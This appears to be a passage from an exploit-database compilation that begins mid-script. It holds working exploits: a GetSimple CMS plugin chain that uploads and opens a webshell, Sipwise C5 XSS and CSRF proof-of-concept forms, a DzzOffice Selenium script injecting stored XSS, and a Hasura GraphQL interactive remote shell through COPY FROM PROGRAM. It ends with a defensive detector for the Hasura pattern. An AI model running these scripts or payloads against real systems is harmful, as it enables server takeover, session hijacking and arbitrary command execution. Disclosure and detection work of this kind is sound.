    SIG += FY+" | </ "+FR+"* * *"+FY+" \\ / \\/ \\\n"
    SIG += FY+" | |> ) "+FR+" * *"+FY+" / \\ \\\n"
    SIG += FY+" |____..- '-.._..-'_|\\___|._..\\___\\\n"
    SIG += FY+" _______"+FR+"github.com/boku7"+FY+"_____\n"+ST
    return SIG

def argsetup():
    about  = SB+FB+' The My SMTP Contact v1.1.2 plugin for GetSimple CMS suffers from a Stored Cross-Site Scripting (XSS) vulnerability, that when chained together with the CSRF vulnerability in v1.1.1, allows remote unauthenticated attackers to achieve Remote Code Execution on the hosting server, when an authenticated administrator visits a malicious third party website.\n'+ST
    about += SB+FC+' CVSS Base Score'+FT+':'+FR+' 9.6 '+FT+'|'+FC+' CVSS v3.1 Vector'+FT+':'+FR+' AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H'+FC
    parser = argparse.ArgumentParser(description=about, formatter_class=argparse.RawTextHelpFormatter)
    desc1 = ST+FC+'Routable domain name of the target GetSimple CMS instance'+SB
    parser.add_argument('Target',type=str,help=desc1)
    desc2 = ST+FC+'Path to the public page which implements the CMS theme'+ST
    parser.add_argument('PublicPage',type=str,help=desc2)
    args = parser.parse_args()
    return args

if __name__ == '__main__':
    header  = SB+FR+' My SMTP Contact GetSimple CMS Plugin\n'
    header += SB+FM+'CSRF '+FT+'-->'+FM+' Stored XSS '+FT+'-->'+FM+' XHR PHP Code Injection '+FT+'-->'+FM+' RCE\n'+ST
    header += SB+FT+' '+FR+' Bobby '+FR+'"'+FR+'boku'+FR+'"'+FR+' Cooke\n'+ST
    print(header)
    args = argsetup()
    target = args.Target
    page = args.PublicPage
    print(sig())
    theTHREADER()
    pwnt = checkWebshell(target)
    if pwnt != 200:
        while pwnt != 200:
            sleep(3)
            tryUploadWebshell(target,page)
            sleep(2)
            pwnt = checkWebshell(target)
    print("{} A wild webshell appears!".format(ok))
    webshell(target)
  22. # Exploit Title: Sipwise C5 NGCP CSC - 'Multiple' Stored/Reflected Cross-Site Scripting (XSS)
# Date: 13.04.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.sipwise.com

Sipwise C5 NGCP CSC Multiple Stored/Reflected XSS Vulnerabilities

Vendor: Sipwise GmbH
Product web page: https://www.sipwise.com
Affected version: <=CE_m39.3.1
                  NGCP www_admin version 3.6.7

Summary: Sipwise C5 (also known as NGCP - the Next Generation Communication Platform) is a SIP-based Open Source Class 5 VoIP soft-switch platform that allows you to provide rich telephony services. It offers a wide range of features (e.g. call forwarding, voicemail, conferencing etc.) that can be configured by end users in the self-care web interface. For operators, it offers a web-based administrative panel that allows them to configure subscribers, SIP peerings, billing profiles, and other entities. The administrative web panel also shows the real-time statistics for the whole system. For tight integration into existing infrastructures, Sipwise C5 provides a powerful REST API interface.

Desc: Sipwise software platform suffers from multiple authenticated stored and reflected cross-site scripting vulnerabilities when input passed via several parameters to several scripts is not properly sanitized before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

Tested on: Apache/2.2.22 (Debian)
           Apache/2.2.16 (Debian)
           nginx

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2021-5648
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5648.php

13.04.2021

--

Stored XSS (POST tsetname):
---------------------------

<html>
  <body>
    <form action="https://10.0.1.7/callforward/time/set/save" method="POST">
      <input type="hidden" name="tsetname" value=""><script>confirm&#40;251&#41;<&#47;script>" />
      <input type="hidden" name="subscriber&#95;id" value="401" />
      <input type="hidden" name="x" value="90027" />
      <input type="hidden" name="y" value="&#45;1" />
      <input type="submit" value="Go for callforward" />
    </form>
  </body>
</html>

Reflected XSS (GET filter):
---------------------------

<html>
  <body>
    <form action="https://10.0.1.7/addressbook" method="GET">
      <input type="hidden" name="filter" value='"><script>confirm(251)</script>' />
      <input type="hidden" name="x" value="0" />
      <input type="hidden" name="y" value="0" />
      <input type="submit" value="Go for addressbook" />
    </form>
  </body>
</html>

Stored XSS (POST firstname, lastname, company):
-----------------------------------------------

<html>
  <body>
    <form action="https://10.0.1.7/addressbook/save" method="POST">
      <input type="hidden" name="firstname" value='"><script>alert(251)</script>' />
      <input type="hidden" name="lastname" value='"><script>alert(251)</script>' />
      <input type="hidden" name="company" value='"><script>alert(251)</script>' />
      <input type="hidden" name="homephonenumber" value="1112223333" />
      <input type="hidden" name="phonenumber" value="3332221111" />
      <input type="hidden" name="mobilenumber" value="" />
      <input type="hidden" name="faxnumber" value="" />
      <input type="hidden" name="email" value="lab%40zeroscience.mk" />
      <input type="hidden" name="homepage" value="" />
      <input type="hidden" name="id" value="" />
      <input type="hidden" name="x" value="89957" />
      <input type="hidden" name="y" value="21" />
      <input type="submit" value="Go for addressbook 2" />
    </form>
  </body>
</html>

Reflected XSS (GET lang):
-------------------------

<html>
  <body>
    <form action="https://10.0.1.7/statistics/versions" method="GET">
      <input type="hidden" name="lang" value="en'-alert(251)-'ZSL" />
      <input type="submit" value="Go for statistics" />
    </form>
  </body>
</html>
  23. # Exploit Title: DzzOffice 2.02.1 - 'Multiple' Cross-Site Scripting (XSS)
# Author: @nu11secur1ty
# Testing and Debugging: @nu11secur1ty, g3ck0dr1v3r
# Date: 04/23/2021
# Vendor: http://www.dzzoffice.com/
# Link: https://github.com/zyx0814/dzzoffice
# CVE: CVE-2021-3318

[+] Exploit Source:

#!/usr/bin/python3
# Author: @nu11secur1ty
# CVE-2021-3318
from selenium import webdriver
import time
import os

# enter the link to the website you want to automate login.
website_link="http://localhost/dzzoffice/user.php?mod=login"
# enter your login username
username="[email protected]"
# enter your login password
password="password"
# enter the element for username input field
element_for_username="email"
# enter the element for password input field
element_for_password="password"
# enter the element for submit button
element_for_submit="loginsubmit"

# Launch the browser
browser = webdriver.Chrome()  # uncomment this line, for chrome users
# Open the login page
browser.get((website_link))

# Run...
try:
    username_element = browser.find_element_by_name(element_for_username)
    username_element.send_keys(username)
    password_element = browser.find_element_by_name(element_for_password)
    password_element.send_keys(password)
    ### Login
    signInButton = browser.find_element_by_name(element_for_submit)
    signInButton.click()
    ### Exploit
    #time.sleep(3)
    element_for_natrutvanie="admin_password"
    laina="http://localhost/dzzoffice/admin.php?mod=appmarket&op=cloudappmarket"
    browser.get((laina))
    ### Next level... :)
    os.system("python poc_login_1.py")
    print("payload is deployed_0...\n")
except Exception:
    #### This exception occurs if the elements are not found in the webpage.
    print("Some error occurred :(")

### os.system
#!/usr/bin/python3
# Author: @nu11secur1ty
# CVE-2021-3318
from selenium import webdriver
import time

# enter the link to the website you want to automate login.
website_link="http://localhost/dzzoffice/admin.php?mod=setting"
# enter your login username
username="[email protected]"
# enter your login password
password="password"
# enter the element for username input field
element_for_username="admin_email"
# enter the element for password input field
element_for_password="admin_password"
# enter the element for submit button
element_for_submit="submit"

# Launch the browser
browser = webdriver.Chrome()  # uncomment this line, for chrome users
# Open the admin login page
browser.get((website_link))

# Run...
try:
    username_element = browser.find_element_by_name(element_for_username)
    username_element.send_keys(username)
    password_element = browser.find_element_by_name(element_for_password)
    password_element.send_keys(password)
    ### Login
    signInButton = browser.find_element_by_name(element_for_submit)
    signInButton.click()
    ### Exploit
    time.sleep(3)
    element_for_natrutvanie="settingsubmit"
    laina="http://localhost/dzzoffice/admin.php?mod=setting"
    browser.get((laina))
    ### Inner text...
    browser.execute_script("document.querySelector('[name=\"settingnew[metakeywords]\"]').value = '<script>alert(\"nu11secur1ty_is_here\");</script>'")
    browser.execute_script("document.querySelector('[name=\"settingnew[sitebeian]\"]').value = '<script>alert(\"nu11secur1ty_is_here\");</script>'")
    browser.execute_script("document.querySelector('[name=\"settingnew[metadescription]\"]').value = '<script>alert(\"nu11secur1ty_is_here\");</script>'")
    browser.execute_script("document.querySelector('[name=\"settingnew[statcode]\"]').value = '<script>alert(\"nu11secur1ty_is_here\");</script>'")
    time.sleep(5)
    # Submit exploit
    signInButton = browser.find_element_by_name(element_for_natrutvanie)
    signInButton.click()
    print("payload is deployed_1...\n")
except Exception:
    #### This exception occurs if the elements are not found in the webpage.
    print("Some error occurred :(")
  24. # Exploit Title: Sipwise C5 NGCP CSC - Click2Dial Cross-Site Request Forgery (CSRF)
# Date: 13.04.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.sipwise.com

Sipwise C5 NGCP CSC CSRF Click2Dial Exploit

Vendor: Sipwise GmbH
Product web page: https://www.sipwise.com
Affected version: <=CE_m39.3.1
                  NGCP www_admin version 3.6.7

Summary: Sipwise C5 (also known as NGCP - the Next Generation Communication Platform) is a SIP-based Open Source Class 5 VoIP soft-switch platform that allows you to provide rich telephony services. It offers a wide range of features (e.g. call forwarding, voicemail, conferencing etc.) that can be configured by end users in the self-care web interface. For operators, it offers a web-based administrative panel that allows them to configure subscribers, SIP peerings, billing profiles, and other entities. The administrative web panel also shows the real-time statistics for the whole system. For tight integration into existing infrastructures, Sipwise C5 provides a powerful REST API interface.

Desc: The application interface allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site.

Tested on: Apache/2.2.22 (Debian)
           Apache/2.2.16 (Debian)
           nginx

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2021-5649
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5649.php

13.04.2021

--

<html>
  <body>
    <form action="https://10.0.1.7/call/click2dial" method="POST">
      <input type="hidden" name="d" value="%2B3897031337" />
      <input type="submit" value="Dial and charge!" />
    </form>
  </body>
</html>
  25. # Exploit Title: Hasura GraphQL 1.3.3 - Remote Code Execution
# Software: Hasura GraphQL
# Software Link: https://github.com/hasura/graphql-engine
# Version: 1.3.3
# Exploit Author: Dolev Farhi
# Date: 4/23/2021
# Tested on: Ubuntu

import requests
import sys

HASURA_SCHEME = 'http'
HASURA_HOST = '192.34.57.144'
HASURA_PORT = 80

print('Start typing shell commands...')

while True:
    cmd = input('cmd $> ')
    data = {
        "type":"bulk",
        "args":[
            {
                "type":"run_sql",
                "args":{
                    "sql":"SET LOCAL statement_timeout = 10000;",
                    "cascade":False,
                    "read_only":False
                }
            },
            {
                "type":"run_sql",
                "args":{
                    "sql":"DROP TABLE IF EXISTS cmd_exec;\nCREATE TABLE cmd_exec(cmd_output text);\nCOPY cmd_exec FROM PROGRAM '" + cmd + "';\nSELECT * FROM cmd_exec;",
                    "cascade":False,
                    "read_only":False
                }
            }
        ]
    }
    endpoint = '{}://{}:{}/v1/query'.format(HASURA_SCHEME, HASURA_HOST, HASURA_PORT)
    r = requests.post(endpoint, json=data)
    if r.ok:
        try:
            for i in r.json()[1]['result']:
                print(''.join(i))
        except:
            print(r.json())
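As an added defensive example (not part of the advisory above and not Hasura's own code), the following Python audits captured /v1/query request bodies for the run_sql / COPY ... FROM PROGRAM pattern this PoC sends, walking nested bulk requests the same way the engine does; the sample bodies are constructed. Detection is secondary to the real mitigation, which is to gate the query endpoint with HASURA_GRAPHQL_ADMIN_SECRET and to connect the engine with a database role that is not a superuser, since COPY ... PROGRAM requires superuser or pg_execute_server_program.

```python
import json
import re
from typing import Iterator, List

# PostgreSQL "COPY ... FROM/TO PROGRAM" is the primitive the PoC above abuses:
# it runs a shell command as the database server's OS user, and Hasura's
# run_sql forwards arbitrary SQL to whatever database role it connects with.
COPY_PROGRAM = re.compile(r"\bCOPY\b[^;]*?\b(?:FROM|TO)\s+PROGRAM\b", re.IGNORECASE)


def iter_run_sql(query: dict) -> Iterator[dict]:
    """Yield every run_sql args object in a /v1/query body, descending into bulk."""
    qtype = query.get("type")
    if qtype == "bulk":
        for sub in query.get("args", []):
            if isinstance(sub, dict):
                yield from iter_run_sql(sub)
    elif qtype == "run_sql" and isinstance(query.get("args"), dict):
        yield query["args"]


def audit_query_body(raw_body: str) -> List[str]:
    """Return findings for one captured /v1/query request body (empty = clean)."""
    try:
        body = json.loads(raw_body)
    except json.JSONDecodeError:
        return ["body is not valid JSON"]
    if not isinstance(body, dict):
        return ["body is not a JSON object"]
    findings: List[str] = []
    for args in iter_run_sql(body):
        sql = args.get("sql", "")
        if not isinstance(sql, str):
            continue
        if COPY_PROGRAM.search(sql):
            findings.append("run_sql runs an OS command via COPY ... PROGRAM")
        elif not args.get("read_only", False):
            # run_sql defaults to read_only=false, so DDL/DML goes straight through
            findings.append("run_sql without read_only=true")
    return findings


# Constructed sample bodies (not captured traffic): the bulk shape used by the
# PoC above with a harmless command, and a read-only query for comparison.
PROBE_BODY = json.dumps({
    "type": "bulk",
    "args": [
        {"type": "run_sql", "args": {"sql": "SET LOCAL statement_timeout = 10000;",
                                     "cascade": False, "read_only": False}},
        {"type": "run_sql", "args": {"sql": "DROP TABLE IF EXISTS cmd_exec;\n"
                                            "CREATE TABLE cmd_exec(cmd_output text);\n"
                                            "COPY cmd_exec FROM PROGRAM 'id';\n"
                                            "SELECT * FROM cmd_exec;",
                                     "cascade": False, "read_only": False}},
    ],
})
BENIGN_BODY = json.dumps({"type": "run_sql",
                          "args": {"sql": "SELECT count(*) FROM users;", "read_only": True}})

if __name__ == "__main__":
    for label, body in (("probe", PROBE_BODY), ("benign", BENIGN_BODY)):
        print(label, audit_query_body(body) or ["clean"])
```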